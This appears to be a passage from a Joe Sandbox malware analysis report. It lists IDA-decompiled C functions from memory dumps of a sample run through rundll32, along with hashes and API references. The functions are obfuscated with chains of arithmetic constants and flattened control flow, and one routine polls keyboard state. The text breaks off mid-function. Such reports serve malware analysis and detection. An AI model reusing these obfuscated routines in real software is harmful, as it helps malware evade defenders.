Snapshot File: hcaresult_9_2_7a0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: -e$62$?M'$h\c$z
API String ID: 0-1842174784
Opcode ID: 3bb5ab6fe4e144f6f9fa152f4c768ba037a2635da891751e18d7284d158d406f
Instruction ID: 652f86e7c53d5872f0eb26bd4578d0fa73cbfc6da6aa261a58da4abf451efafc
Opcode Fuzzy Hash: 3bb5ab6fe4e144f6f9fa152f4c768ba037a2635da891751e18d7284d158d406f
Instruction Fuzzy Hash: 5C811EB15093819FD3A8CF65D58991BBBF5FBD9758F408A0CF29586260D3B6CA08CF42

Uniqueness

Uniqueness Score: -1.00%

Function 007BBE27 Relevance: 6.4, Strings: 5, Instructions: 130
COMMONCrypto

Download Yara Rule

C-Code - Quality: 94%

			E007BBE27(intOrPtr* __ecx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				char _v320;
				char _t133;
				signed int _t136;
				void* _t139;
				signed int _t141;
				signed int _t142;
				signed int _t143;
				char* _t144;
				intOrPtr* _t163;
				void* _t164;

				_v40 = 0x365269;
				_v40 = _v40 >> 7;
				_v40 = _v40 ^ 0x00099806;
				_v16 = 0x620947;
				_v16 = _v16 + 0x25da;
				_v16 = _v16 | 0xf0dff1a3;
				_v16 = _v16 + 0xffff8fd5;
				_v16 = _v16 ^ 0xf0f65193;
				_v60 = 0x4a6911;
				_v60 = _v60 >> 2;
				_v60 = _v60 ^ 0x0015bfec;
				_v32 = 0xee641f;
				_v32 = _v32 ^ 0x54466854;
				_v32 = _v32 ^ 0x51df3278;
				_v32 = _v32 ^ 0x057124b2;
				_v36 = 0x2245a1;
				_t163 = __ecx;
				_t141 = 0x59;
				_v36 = _v36 / _t141;
				_t142 = 0x7c;
				_v36 = _v36 / _t142;
				_v36 = _v36 ^ 0x00022b59;
				_v52 = 0x17e728;
				_v52 = _v52 << 7;
				_v52 = _v52 ^ 0x0bfefc33;
				_v24 = 0x5a7c12;
				_v24 = _v24 + 0xffff6a30;
				_v24 = _v24 + 0xb9bd;
				_v24 = _v24 ^ 0x00522d4c;
				_v8 = 0x70b293;
				_v8 = _v8 ^ 0xb7f64013;
				_v8 = _v8 | 0x98950303;
				_v8 = _v8 << 0x10;
				_v8 = _v8 ^ 0xf38d6f21;
				_v28 = 0x5e48e6;
				_v28 = _v28 >> 2;
				_v28 = _v28 << 0xf;
				_v28 = _v28 ^ 0xc917f664;
				_v44 = 0xd34be4;
				_v44 = _v44 ^ 0x1af04c78;
				_v44 = _v44 ^ 0x1a25cf5b;
				_v56 = 0x13a2c8;
				_v56 = _v56 ^ 0x00107e6c;
				_v20 = 0x6acc1;
				_t143 = 0x48;
				_v20 = _v20 * 0x75;
				_v20 = _v20 | 0x5ce04716;
				_v20 = _v20 ^ 0xfe39b07b;
				_v20 = _v20 ^ 0xa1d6ae77;
				_v48 = 0x9d30cb;
				_t144 =  &_v320;
				_v48 = _v48 / _t143;
				_v48 = _v48 ^ 0x00028c5d;
				_v12 = 0x456efe;
				_v12 = _v12 + 0xffff4082;
				_v12 = _v12 >> 1;
				_v12 = _v12 ^ 0xdbb5e427;
				_v12 = _v12 ^ 0xdb99f5c8;
				while(1) {
					_t133 =  *_t163;
					if(_t133 == 0) {
						break;
					}
					if(_t133 == 0x2e) {
						 *_t144 = 0;
					} else {
						 *_t144 = _t133;
						_t144 = _t144 + 1;
						_t163 = _t163 + 1;
						continue;
					}
					L6:
					_t164 = E007AADE6(_v40, _v16,  &_v320, _v60);
					if(_t164 != 0) {
						L8:
						_t136 = E007BDBEA(_t163 + 1, _v8, _v28, _v44);
						_push(_v12);
						_push(_t136 ^ 0x2ac2611c);
						_push(_v48);
						_push(_t164);
						return E007ACDCD(_v56, _v20);
					}
					_t139 = E007BCADF(_v32,  &_v320, _v36, _v52);
					_t164 = _t139;
					if(_t164 != 0) {
						goto L8;
					}
					return _t139;
				}
				goto L6;
			}

0x007bbe30
0x007bbe39
0x007bbe3d
0x007bbe44
0x007bbe4b
0x007bbe52
0x007bbe59
0x007bbe60
0x007bbe67
0x007bbe6e
0x007bbe72
0x007bbe79
0x007bbe80
0x007bbe87
0x007bbe8e
0x007bbe95
0x007bbea3
0x007bbea5
0x007bbeaa
0x007bbeb2
0x007bbeb7
0x007bbebc
0x007bbec3
0x007bbeca
0x007bbece
0x007bbed5
0x007bbedc
0x007bbee3
0x007bbeea
0x007bbef1
0x007bbef8
0x007bbeff
0x007bbf06
0x007bbf0a
0x007bbf11
0x007bbf18
0x007bbf1c
0x007bbf20
0x007bbf27
0x007bbf2e
0x007bbf35
0x007bbf3c
0x007bbf49
0x007bbf50
0x007bbf5b
0x007bbf5c
0x007bbf5f
0x007bbf66
0x007bbf6d
0x007bbf74
0x007bbf80
0x007bbf86
0x007bbf89
0x007bbf90
0x007bbf97
0x007bbf9e
0x007bbfa1
0x007bbfa8
0x007bbfb9
0x007bbfb9
0x007bbfbd
0x00000000
0x00000000
0x007bbfb3
0x007bbfc1
0x007bbfb5
0x007bbfb5
0x007bbfb7
0x007bbfb8
0x00000000
0x007bbfb8
0x007bbfc4
0x007bbfd9
0x007bbfdf
0x007bbffd
0x007bc00c
0x007bc011
0x007bc019
0x007bc01a
0x007bc023
0x00000000
0x007bc029
0x007bbff0
0x007bbff5
0x007bbffb
0x00000000
0x00000000
0x007bc031
0x007bc031
0x00000000

Strings

H^, xrefs: 007BBF11
L-R, xrefs: 007BBEEA
iR6, xrefs: 007BBE30
Gb, xrefs: 007BBE44
ThFT, xrefs: 007BBE80

Memory Dump Source

Source File: 00000009.00000002.497023590.00000000007A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 007A0000, based on PE: true

Associated: 00000009.00000002.497015544.00000000007A0000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.497057228.00000000007C3000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7a0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: Gb$L-R$ThFT$iR6$H^
API String ID: 0-1567385930
Opcode ID: 530a903c014da879c72b207405b5d78bc36da64ddf1a64a5b02b4b5b0fc68630
Instruction ID: 84b54cf4b052e3d7003305bb526c8466e78eca592c4baa253381d2c0a6e502a6
Opcode Fuzzy Hash: 530a903c014da879c72b207405b5d78bc36da64ddf1a64a5b02b4b5b0fc68630
Instruction Fuzzy Hash: DB513271C05219EBDF18DFA4D94A9EEFBB1FF09314F208159D812BA260C3B91A55CF94

Uniqueness

Uniqueness Score: -1.00%

Function 1001B43F Relevance: 6.0, APIs: 4, Instructions: 41keyboardwindowCOMMON

Download Yara Rule

APIs

Part of subcall function 1001DDC0: GetWindowLongA.USER32(?,000000F0), ref: 1001DDCB

GetKeyState.USER32(00000010), ref: 1001B463
GetKeyState.USER32(00000011), ref: 1001B46C
GetKeyState.USER32(00000012), ref: 1001B475
SendMessageA.USER32 ref: 1001B48B

Memory Dump Source

Source File: 00000009.00000002.497160748.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.497152755.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497600362.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497627055.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497650299.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497688957.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: State$LongMessageSendWindow
String ID:
API String ID: 1063413437-0
Opcode ID: cbe92a3c8afafbb230f3664375f9361b4519f62e794af51cea28ccd5527820e8
Instruction ID: b089c7fc05c7e6fbdd4fc06f52c570ea12a8721339fdd196cb0bdf3cbec2e35a
Opcode Fuzzy Hash: cbe92a3c8afafbb230f3664375f9361b4519f62e794af51cea28ccd5527820e8
Instruction Fuzzy Hash: F6F0E97679075A27EB20BA744CC1F9A0154DF89BD9F028534B741EE0D3DBB0C8819170

Uniqueness

Uniqueness Score: -1.00%

Function 007B20BA Relevance: 5.2, Strings: 4, Instructions: 240
COMMONCrypto

Download Yara Rule

C-Code - Quality: 76%

			E007B20BA() {
				char _v520;
				signed int _v524;
				unsigned int _v528;
				signed int _v532;
				signed int _v536;
				signed int _v540;
				signed int _v544;
				signed int _v548;
				signed int _v552;
				signed int _v556;
				signed int _v560;
				signed int _v564;
				signed int _v568;
				signed int _v572;
				signed int _v576;
				signed int _v580;
				signed int _v584;
				signed int _v588;
				signed int _v592;
				signed int _v596;
				signed int _v600;
				signed int _v604;
				signed int _v608;
				signed int _v612;
				signed int _v616;
				signed int _v620;
				signed int _v624;
				signed int _t227;
				intOrPtr _t228;
				signed int _t230;
				void* _t231;
				intOrPtr _t235;
				intOrPtr _t245;
				void* _t247;
				intOrPtr _t254;
				signed int _t272;
				signed int _t273;
				signed int _t274;
				signed int _t275;
				void* _t277;
				signed int* _t279;
				void* _t283;

				_t279 =  &_v624;
				_v612 = 0x15bebb;
				_v612 = _v612 ^ 0x0c09d82a;
				_t247 = 0x7e01d7;
				_v612 = _v612 + 0xffff69e9;
				_v612 = _v612 ^ 0xcffb1e8d;
				_v612 = _v612 ^ 0xc3e0ceeb;
				_v596 = 0xb5bc7f;
				_v596 = _v596 << 0xa;
				_v596 = _v596 + 0xbaa7;
				_v596 = _v596 ^ 0xd6f2b68e;
				_v600 = 0x5909af;
				_v600 = _v600 ^ 0x0096463d;
				_v600 = _v600 >> 3;
				_v600 = _v600 ^ 0x0016e9cd;
				_v548 = 0x801d18;
				_v548 = _v548 + 0xffffc800;
				_v548 = _v548 ^ 0x0070ca5a;
				_v580 = 0x2361dd;
				_v580 = _v580 * 0x6f;
				_t277 = 0;
				_v580 = _v580 << 0xe;
				_v580 = _v580 ^ 0xdbb34e1e;
				_v528 = 0x864281;
				_v528 = _v528 >> 0xc;
				_v528 = _v528 ^ 0x0000b217;
				_v560 = 0x478502;
				_v560 = _v560 | 0x3d47d1eb;
				_v560 = _v560 ^ 0x3d4c1a49;
				_v540 = 0x8f961f;
				_v540 = _v540 >> 0xc;
				_v540 = _v540 ^ 0x000d133d;
				_v572 = 0xef4b2;
				_v572 = _v572 << 0xd;
				_v572 = _v572 + 0xffff85b1;
				_v572 = _v572 ^ 0xde949f86;
				_v608 = 0x8e969a;
				_v608 = _v608 << 0xd;
				_t272 = 0x21;
				_v608 = _v608 / _t272;
				_t273 = 0x2f;
				_v608 = _v608 / _t273;
				_v608 = _v608 ^ 0x002a10b8;
				_v620 = 0x864bbd;
				_v620 = _v620 << 0x10;
				_v620 = _v620 + 0x87ba;
				_v620 = _v620 + 0x936f;
				_v620 = _v620 ^ 0x4bb78bcc;
				_v564 = 0xfb8a17;
				_t274 = 0x62;
				_v564 = _v564 * 0x63;
				_v564 = _v564 ^ 0x61429d97;
				_v576 = 0x222f;
				_v576 = _v576 >> 4;
				_v576 = _v576 ^ 0xf39884cf;
				_v576 = _v576 ^ 0xf39d4647;
				_v556 = 0x6068cb;
				_v556 = _v556 ^ 0xfe1a734d;
				_v556 = _v556 ^ 0xfe79d9b4;
				_v616 = 0xc46e23;
				_v616 = _v616 >> 2;
				_v616 = _v616 / _t274;
				_v616 = _v616 * 0x76;
				_v616 = _v616 ^ 0x003e2a5a;
				_v624 = 0x4617e4;
				_v624 = _v624 + 0xffff4d74;
				_v624 = _v624 ^ 0x9dcdfd87;
				_v624 = _v624 + 0x3fd8;
				_v624 = _v624 ^ 0x9d89a5c2;
				_v588 = 0x3a0167;
				_v588 = _v588 << 1;
				_v588 = _v588 + 0xffff1a51;
				_v588 = _v588 ^ 0x00728a40;
				_v532 = 0x3a363e;
				_v532 = _v532 ^ 0xe52a74a2;
				_v532 = _v532 ^ 0xe514694b;
				_v544 = 0x52d5cb;
				_v544 = _v544 | 0x185d0a08;
				_v544 = _v544 ^ 0x18524fe5;
				_v584 = 0x37b3aa;
				_v584 = _v584 + 0xebef;
				_t275 = 0x72;
				_v584 = _v584 * 0x28;
				_v584 = _v584 ^ 0x08d0b087;
				_v592 = 0xa4bebe;
				_v592 = _v592 >> 8;
				_v592 = _v592 | 0x739fbd45;
				_v592 = _v592 ^ 0x739593e3;
				_v552 = 0x17b1c;
				_v552 = _v552 << 0xe;
				_v552 = _v552 ^ 0x5ecd7403;
				_v568 = 0x403d75;
				_v568 = _v568 >> 3;
				_v568 = _v568 | 0x80b15bc0;
				_v568 = _v568 ^ 0x80b9a416;
				_v536 = 0x2ed64e;
				_t276 = _v524;
				_v536 = _v536 / _t275;
				_v536 = _v536 ^ 0x00033d67;
				_v604 = 0x8b403d;
				_v604 = _v604 + 0xffff3866;
				_v604 = _v604 << 8;
				_v604 = _v604 ^ 0x8a7a6cd3;
				goto L1;
				do {
					while(1) {
						L1:
						_t283 = _t247 - 0x73dad95;
						if(_t283 > 0) {
							break;
						}
						if(_t283 == 0) {
							E007BDA22(_v544, _v584, __eflags, _v592,  &_v520, _t247, _v552);
							_t235 = E007A2051(_v536,  &_v520, _v604);
							_t254 =  *0x7c3e10; // 0x0
							 *((intOrPtr*)(_t254 + 0x10)) = _t235;
						} else {
							if(_t247 == 0x7e01d7) {
								_push(_t247);
								_push(_t247);
								 *0x7c3e10 = E007A7FF2(0x45c);
								_t247 = 0x8643fcd;
								continue;
							} else {
								if(_t247 == 0xd34913) {
									_t247 = 0x148c4fa;
									_v524 = _v596;
									continue;
								} else {
									if(_t247 == 0xfeb697) {
										_v524 = _v612;
										goto L8;
									} else {
										if(_t247 != 0x148c4fa) {
											goto L20;
										} else {
											E007B8F9E(_v620, _v564, _v576, _v556, _t276);
											_t279 =  &(_t279[3]);
											L8:
											_t247 = 0xac90332;
											continue;
										}
									}
								}
							}
						}
						L23:
						return _t277;
					}
					__eflags = _t247 - 0x8643fcd;
					if(_t247 == 0x8643fcd) {
						_t227 = E007A912C(_v600, _v560, _t247, _v540, _t247, _v572, _v608);
						_t276 = _t227;
						_t279 =  &(_t279[5]);
						__eflags = _t227;
						if(__eflags == 0) {
							_t247 = 0xfeb697;
							goto L20;
						} else {
							_t245 =  *0x7c3e10; // 0x0
							 *((intOrPtr*)(_t245 + 0x450)) = 1;
							_t247 = 0xd34913;
							goto L1;
						}
					} else {
						__eflags = _t247 - 0xac90332;
						if(_t247 == 0xac90332) {
							_push(_v532);
							_push(_v524);
							_push(_v588);
							_t228 =  *0x7c3e10; // 0x0
							_push(_t228 + 0x23c);
							_t230 = E007B46BB(_v616, _v624);
							_t279 = _t279 - 0xc + 0x1c;
							_t247 = 0xe2d9513;
							__eflags = _t230;
							_t231 = 1;
							_t277 =  ==  ? _t231 : _t277;
							goto L1;
						} else {
							__eflags = _t247 - 0xe2d9513;
							if(_t247 != 0xe2d9513) {
								goto L20;
							} else {
								E007AA55F();
								_t247 = 0x73dad95;
								goto L1;
							}
						}
					}
					goto L23;
					L20:
					__eflags = _t247 - 0x13a2d4a;
				} while (__eflags != 0);
				goto L23;
			}

0x007b20ba
0x007b20c0
0x007b20ca
0x007b20d2
0x007b20d7
0x007b20df
0x007b20e7
0x007b20ef
0x007b20f7
0x007b20fc
0x007b2104
0x007b210c
0x007b2114
0x007b211c
0x007b2121
0x007b2129
0x007b2131
0x007b2139
0x007b2141
0x007b2152
0x007b2156
0x007b2158
0x007b215d
0x007b2165
0x007b216d
0x007b2172
0x007b217a
0x007b2182
0x007b218a
0x007b2192
0x007b219a
0x007b219f
0x007b21a7
0x007b21af
0x007b21b4
0x007b21bc
0x007b21c4
0x007b21cc
0x007b21d7
0x007b21dc
0x007b21e6
0x007b21eb
0x007b21f1
0x007b21f9
0x007b2201
0x007b2206
0x007b220e
0x007b2216
0x007b221e
0x007b222b
0x007b222c
0x007b2230
0x007b2238
0x007b2240
0x007b2245
0x007b224d
0x007b2255
0x007b225d
0x007b2265
0x007b226d
0x007b2275
0x007b2280
0x007b2289
0x007b228d
0x007b2297
0x007b22a4
0x007b22b1
0x007b22b9
0x007b22c1
0x007b22c9
0x007b22d1
0x007b22d5
0x007b22dd
0x007b22e5
0x007b22ed
0x007b22f5
0x007b22fd
0x007b2305
0x007b230d
0x007b2315
0x007b231d
0x007b232c
0x007b232d
0x007b2331
0x007b2339
0x007b2341
0x007b2346
0x007b234e
0x007b2356
0x007b235e
0x007b2363
0x007b236b
0x007b2373
0x007b2378
0x007b2380
0x007b2388
0x007b2396
0x007b239a
0x007b239e
0x007b23a6
0x007b23ae
0x007b23b6
0x007b23bb
0x007b23bb
0x007b23c3
0x007b23c3
0x007b23c3
0x007b23c3
0x007b23c5
0x00000000
0x00000000
0x007b23cb
0x007b2519
0x007b2532
0x007b2537
0x007b2540
0x007b23d1
0x007b23d7
0x007b243c
0x007b243d
0x007b2445
0x007b244a
0x00000000
0x007b23d9
0x007b23df
0x007b2420
0x007b2425
0x00000000
0x007b23e1
0x007b23e7
0x007b2416
0x00000000
0x007b23e9
0x007b23ef
0x00000000
0x007b23f5
0x007b2406
0x007b240b
0x007b240e
0x007b240e
0x00000000
0x007b240e
0x007b23ef
0x007b23e7
0x007b23df
0x007b23d7
0x007b2544
0x007b254f
0x007b254f
0x007b2454
0x007b245a
0x007b24ca
0x007b24cf
0x007b24d1
0x007b24d4
0x007b24d6
0x007b24f0
0x00000000
0x007b24d8
0x007b24d8
0x007b24e0
0x007b24e6
0x00000000
0x007b24e6
0x007b245c
0x007b245c
0x007b245e
0x007b2478
0x007b247c
0x007b2480
0x007b2484
0x007b2499
0x007b249a
0x007b249f
0x007b24a2
0x007b24a7
0x007b24ab
0x007b24ac
0x00000000
0x007b2460
0x007b2460
0x007b2466
0x00000000
0x007b246c
0x007b246c
0x007b2471
0x00000000
0x007b2471
0x007b2466
0x007b245e
0x00000000
0x007b24f5
0x007b24f5
0x007b24f5
0x00000000

Strings

u=@, xrefs: 007B236B
/", xrefs: 007B2238
Z*>, xrefs: 007B228D
>6:, xrefs: 007B22E5

Memory Dump Source

Source File: 00000009.00000002.497023590.00000000007A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 007A0000, based on PE: true

Associated: 00000009.00000002.497015544.00000000007A0000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.497057228.00000000007C3000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7a0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: /"$>6:$Z*>$u=@
API String ID: 0-89199335
Opcode ID: a380f298d9d2b6c6a0bfbe067caa7be4d2e30a3b7e3fa2817111c1890a03e141
Instruction ID: e27f7f9b2001e5a6ba47b8ced1cf09f6d23746d8fbb13c48f1c8e11689509932
Opcode Fuzzy Hash: a380f298d9d2b6c6a0bfbe067caa7be4d2e30a3b7e3fa2817111c1890a03e141
Instruction Fuzzy Hash: 11B112711093809FC358CF65C48A91FBBE1FBD4748F209A1DF6A686261D3B9C94ACF46

Uniqueness

Uniqueness Score: -1.00%

Function 007A5548 Relevance: 5.2, Strings: 4, Instructions: 233
COMMONCrypto

Download Yara Rule

C-Code - Quality: 94%

			E007A5548(void* __edx, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				char _v16;
				intOrPtr _v24;
				char _v28;
				char _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				char _v64;
				signed int _v68;
				char _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				unsigned int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				void* __ecx;
				void* _t190;
				void* _t206;
				void* _t208;
				signed int _t209;
				char* _t211;
				signed int _t212;
				intOrPtr _t222;
				intOrPtr* _t225;
				void* _t227;
				char* _t229;
				char _t233;
				intOrPtr _t255;
				intOrPtr* _t257;
				signed int _t258;
				signed int _t259;
				signed int _t260;
				signed int* _t263;

				_t225 = _a16;
				_t257 = _a4;
				_push(_t225);
				_push(_a12);
				_push(_a8);
				_push(_t257);
				_push(__edx);
				E007B20B9(_t190);
				_v56 = 0xb9e7cb;
				_t255 = 0;
				_v52 = 0x6e87b5;
				_t263 =  &(( &_v148)[6]);
				_v48 = 0;
				_v44 = 0;
				_t227 = 0x3ccc1e9;
				_v128 = 0x85629b;
				_t258 = 0x62;
				_v128 = _v128 * 0x5a;
				_v128 = _v128 + 0xfbaf;
				_v128 = _v128 ^ 0x2ee5a62d;
				_v144 = 0xfc0c7f;
				_v144 = _v144 ^ 0xfdfaf442;
				_v144 = _v144 >> 1;
				_v144 = _v144 | 0x14143ad1;
				_v144 = _v144 ^ 0x7e977ecf;
				_v96 = 0xd1f565;
				_v96 = _v96 * 0x21;
				_v96 = _v96 ^ 0x1b12de47;
				_v104 = 0xb219e8;
				_v104 = _v104 | 0x75a31cc8;
				_v104 = _v104 ^ 0x75be6df4;
				_v80 = 0x6fb9b6;
				_v80 = _v80 * 0x3e;
				_v80 = _v80 ^ 0x1b001c4a;
				_v132 = 0x1154a0;
				_v132 = _v132 << 0xb;
				_v132 = _v132 + 0xfffffde8;
				_v132 = _v132 | 0xd1d436bb;
				_v132 = _v132 ^ 0xdbfeae5a;
				_v76 = 0x5374cd;
				_v76 = _v76 << 2;
				_v76 = _v76 ^ 0x0147cb67;
				_v140 = 0x35e68a;
				_v140 = _v140 + 0xffff467d;
				_v140 = _v140 * 0x7c;
				_v140 = _v140 ^ 0x566bba39;
				_v140 = _v140 ^ 0x4faa8078;
				_v124 = 0xf91357;
				_v124 = _v124 << 0xf;
				_v124 = _v124 + 0xf2e4;
				_v124 = _v124 ^ 0x89afe8a4;
				_v112 = 0xf055e4;
				_v112 = _v112 ^ 0x101963ca;
				_v112 = _v112 | 0x7be8ad21;
				_v112 = _v112 ^ 0x7be17431;
				_v84 = 0x17393b;
				_v84 = _v84 << 6;
				_v84 = _v84 ^ 0x05c81c43;
				_v120 = 0xf688ab;
				_v120 = _v120 / _t258;
				_v120 = _v120 * 0x2d;
				_v120 = _v120 ^ 0x00718a36;
				_v116 = 0xa21f51;
				_v116 = _v116 + 0x3c3b;
				_v116 = _v116 >> 0xa;
				_v116 = _v116 ^ 0x0006c391;
				_v88 = 0x51e239;
				_v88 = _v88 + 0x2ec0;
				_v88 = _v88 ^ 0x0058dd2b;
				_v136 = 0xa92d92;
				_v136 = _v136 >> 0xd;
				_v136 = _v136 ^ 0x0647b396;
				_v136 = _v136 ^ 0x20b7ff2f;
				_v136 = _v136 ^ 0x26fd7475;
				_v108 = 0xb50576;
				_t259 = 0x45;
				_v108 = _v108 / _t259;
				_v108 = _v108 ^ 0xb94dc178;
				_v108 = _v108 ^ 0xb943792d;
				_v148 = 0xb9b260;
				_t260 = 0x14;
				_v148 = _v148 / _t260;
				_v148 = _v148 * 0x3f;
				_v148 = _v148 >> 2;
				_v148 = _v148 ^ 0x009e914b;
				_v92 = 0x6e7d65;
				_v92 = _v92 | 0xb573042f;
				_v92 = _v92 ^ 0xb570b7bc;
				_v100 = 0xfd8f7e;
				_v100 = _v100 * 0x5d;
				_v100 = _v100 ^ 0x5c1db3f3;
				L1:
				while(_t227 != 0x3c16ad4) {
					if(_t227 == 0x3ccc1e9) {
						_t227 = 0x7dbf5b4;
						continue;
					}
					if(_t227 == 0x79abc1a) {
						_t229 =  &_v28;
						_t208 = E007AAEFB(_t229, _v124, _v112, _v84,  &_v16, _v120);
						_t263 =  &(_t263[4]);
						if(_t208 != 0) {
							_push(_t229);
							_push(_t229);
							_t222 = E007A7FF2(_v24);
							 *_t257 = _t222;
							if(_t222 != 0) {
								E007AED7E(_v108,  *_t257, _v148, _v28, _v24);
								_t263 =  &(_t263[3]);
								 *((intOrPtr*)(_t257 + 4)) = _v24;
								_t255 = 1;
							}
						}
						_t227 = 0xdaef9d5;
						continue;
					}
					if(_t227 == 0x7dbf5b4) {
						_t209 =  *((intOrPtr*)(_t225 + 4));
						_t233 =  *_t225;
						_v68 = _t209;
						_v72 = _t233;
						_t211 = _t209 - 1 + _t233;
						while(_t211 > _t233) {
							if( *_t211 == 0) {
								break;
							}
							_t211 = _t211 - 1;
						}
						_t212 = _t211 - _t233;
						_v68 = _t212;
						if(_t212 == 0) {
							L16:
							_t227 = 0xfc35b14;
							continue;
						}
						while(_v68 % _v144 != _v128) {
							_t163 =  &_v68;
							 *_t163 = _v68 - 1;
							if( *_t163 != 0) {
								continue;
							}
							goto L16;
						}
						goto L16;
					}
					if(_t227 == 0xdaef9d5) {
						E007B8519(_v92, _v100, _v64);
						L28:
						return _t255;
					}
					if(_t227 != 0xfc35b14) {
						L25:
						if(_t227 != 0xb843ed5) {
							continue;
						}
						goto L28;
					}
					if(E007A5E60( &_v72, _v96, _v104,  &_v64) == 0) {
						goto L28;
					}
					_t227 = 0x3c16ad4;
				}
				_t206 = E007A8B3D( &_v40, _v80, _v132,  &_v64, _v76, _v140);
				_t263 =  &(_t263[4]);
				if(_t206 == 0) {
					_t227 = 0xdaef9d5;
					goto L25;
				}
				_t227 = 0x79abc1a;
				goto L1;
			}

0x007a554f
0x007a5558
0x007a5560
0x007a5561
0x007a5568
0x007a556f
0x007a5570
0x007a5572
0x007a5577
0x007a5582
0x007a5584
0x007a558f
0x007a5592
0x007a5598
0x007a559c
0x007a55a1
0x007a55b0
0x007a55b1
0x007a55b5
0x007a55bd
0x007a55c5
0x007a55cd
0x007a55d5
0x007a55d9
0x007a55e1
0x007a55e9
0x007a55f6
0x007a55fa
0x007a5602
0x007a560a
0x007a5612
0x007a561a
0x007a5627
0x007a562b
0x007a5633
0x007a563b
0x007a5640
0x007a5648
0x007a5650
0x007a5658
0x007a5660
0x007a5665
0x007a566d
0x007a5675
0x007a5682
0x007a5686
0x007a568e
0x007a5696
0x007a569e
0x007a56a3
0x007a56ab
0x007a56b3
0x007a56bb
0x007a56c3
0x007a56cb
0x007a56d3
0x007a56db
0x007a56e0
0x007a56e8
0x007a56f6
0x007a56ff
0x007a5703
0x007a570b
0x007a5713
0x007a571b
0x007a5720
0x007a5728
0x007a5730
0x007a573a
0x007a5742
0x007a574a
0x007a574f
0x007a5757
0x007a575f
0x007a5767
0x007a5775
0x007a577a
0x007a5780
0x007a5788
0x007a5790
0x007a579c
0x007a57a4
0x007a57ad
0x007a57b1
0x007a57b6
0x007a57be
0x007a57c6
0x007a57ce
0x007a57d6
0x007a57e3
0x007a57e7
0x00000000
0x007a57ef
0x007a5801
0x007a591d
0x00000000
0x007a591d
0x007a580d
0x007a58ac
0x007a58bb
0x007a58c0
0x007a58c5
0x007a58da
0x007a58db
0x007a58dc
0x007a58e1
0x007a58e7
0x007a5901
0x007a590f
0x007a5912
0x007a5915
0x007a5915
0x007a58e7
0x007a5916
0x00000000
0x007a5916
0x007a5819
0x007a5856
0x007a5859
0x007a585b
0x007a5860
0x007a5864
0x007a586e
0x007a586b
0x00000000
0x00000000
0x007a586d
0x007a586d
0x007a5872
0x007a5874
0x007a5878
0x007a5892
0x007a5892
0x00000000
0x007a5892
0x007a587a
0x007a588c
0x007a588c
0x007a5890
0x00000000
0x00000000
0x00000000
0x007a5890
0x00000000
0x007a587a
0x007a581d
0x007a5975
0x007a597b
0x007a5987
0x007a5987
0x007a5829
0x007a595b
0x007a5961
0x00000000
0x00000000
0x00000000
0x007a5967
0x007a5849
0x00000000
0x00000000
0x007a584f
0x007a584f
0x007a5943
0x007a5948
0x007a594d
0x007a5959
0x00000000
0x007a5959
0x007a594f
0x00000000

Strings

e}n, xrefs: 007A57BE
;<, xrefs: 007A5713
9Q, xrefs: 007A5728
1t{, xrefs: 007A56CB

Memory Dump Source

Source File: 00000009.00000002.497023590.00000000007A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 007A0000, based on PE: true

Associated: 00000009.00000002.497015544.00000000007A0000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.497057228.00000000007C3000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7a0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: 1t{$9Q$;<$e}n
API String ID: 0-2095593254
Opcode ID: 3e729f004d8ed529ecf323f69a5bd049de09d4616ed983f039155076c9e898ed
Instruction ID: c85eb5c16bc5f42e2c34abf3b00a00d3407501f6d3f5f2de4513b80b5fcecc40
Opcode Fuzzy Hash: 3e729f004d8ed529ecf323f69a5bd049de09d4616ed983f039155076c9e898ed
Instruction Fuzzy Hash: 56B141B1108341DFC368CF21C58591BBBE1FBC6748F508A1DF6969A260D7B59A49CF43

Uniqueness

Uniqueness Score: -1.00%

Function 007B7DD5 Relevance: 5.2, Strings: 4, Instructions: 226
COMMONCrypto

Download Yara Rule

C-Code - Quality: 95%

			E007B7DD5() {
				char _v520;
				char _v1040;
				signed int _v1044;
				signed int _v1048;
				intOrPtr _v1052;
				intOrPtr _v1056;
				unsigned int _v1060;
				signed int _v1064;
				signed int _v1068;
				signed int _v1072;
				signed int _v1076;
				signed int _v1080;
				signed int _v1084;
				signed int _v1088;
				signed int _v1092;
				signed int _v1096;
				signed int _v1100;
				signed int _v1104;
				signed int _v1108;
				signed int _v1112;
